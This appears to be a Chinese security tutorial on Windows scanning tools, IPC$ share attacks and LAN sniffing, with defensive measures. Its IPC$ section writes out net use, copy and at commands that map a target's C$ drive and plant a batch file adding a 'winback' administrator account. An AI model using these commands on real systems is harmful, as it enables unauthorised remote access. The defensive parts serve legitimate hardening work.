安全

网络扫描与嗅探工具及安全防护

Windows 下的网络扫描工具

1. SuperScan

• 功能特点：一款经典的端口扫描工具，支持 IP 地址范围扫描、端口扫描、Ping 测试等功能，可快速探测目标主机的开放端口和服务信息。
• 优势：操作简单，扫描速度快，适合新手使用，能直观展示目标主机的网络状态。

2. X-Scan

• 功能特点：集成了多种扫描功能，包括端口扫描、漏洞检测、弱口令检测等，可对目标主机进行全面的安全评估。
• 优势：支持批量扫描，能生成详细的扫描报告，帮助用户发现目标系统存在的安全隐患。

3. 流光主机扫描器

• 功能特点：专注于主机扫描和漏洞探测，可扫描局域网内的存活主机，检测常见的漏洞和弱口令。
• 优势：扫描精度较高，对网络环境的适应性强，适合在复杂网络环境中使用。

IPC$ 共享相关操作

1. 连接 IPC$ 共享

通过net use命令可以连接目标主机的 IPC$ 共享，命令格式如下：

net use \\目标IP\ipc$

该命令用于建立与目标主机的 IPC$ 共享连接，若连接成功，可进一步进行后续操作。

2. 映射磁盘

使用以下命令可将目标主机的磁盘映射到本地计算机：

net use y: \\目标IP\c$

此命令将目标主机的 C 盘映射到本地的 Y 盘，方便用户像访问本地磁盘一样访问目标主机的磁盘内容。

3. 创建后门账号

• 编写批处理文件：创建一个.bat文件，内容如下：

  net user winback 123456 /add  // 添加用户winback，密码123456
  net localgroup administrators winback /add  // 将用户winback添加到管理员组

• 拷贝批处理文件到目标主机：

  copy winback.bat \\目标IP\c$

• 执行批处理文件：可以通过at命令定时执行该脚本，例如：

  at \\目标IP 12:00 c:\winback.bat  // 在12:00执行目标主机C盘下的winback.bat文件

IPC$ 共享的防范措施

1. 去除共享

使用以下命令可以删除 IPC$ 共享及其他默认共享：

net share ipc$ /delete  // 删除IPC$共享
net share admin$ /delete  // 删除admin$共享
net share c$ /delete  // 删除C盘共享
net share d$ /delete  // 删除D盘共享

2. 屏蔽端口

139 端口和 445 端口是 IPC(共享依赖的重要端口，屏蔽这两个端口可有效阻止非法的IPC)连接。可以通过 Windows 防火墙或其他安全软件进行端口屏蔽设置。

局域网嗅探工具

Sniffer

• 功能特点：一款局域网窃听工具，能够捕获局域网内的网络数据包，并对数据包进行分析，获取其中的敏感信息，如账号密码、聊天内容等。
• 风险：使用 Sniffer 进行未经授权的网络嗅探属于违法行为，会侵犯他人的隐私和网络安全。
• 防范措施：
  • 使用加密传输协议，如 HTTPS、SSL 等，对传输的数据进行加密。
  • 划分 VLAN，将局域网分段，限制嗅探范围。
  • 安装反嗅探工具，及时发现并阻止非法的嗅探行为。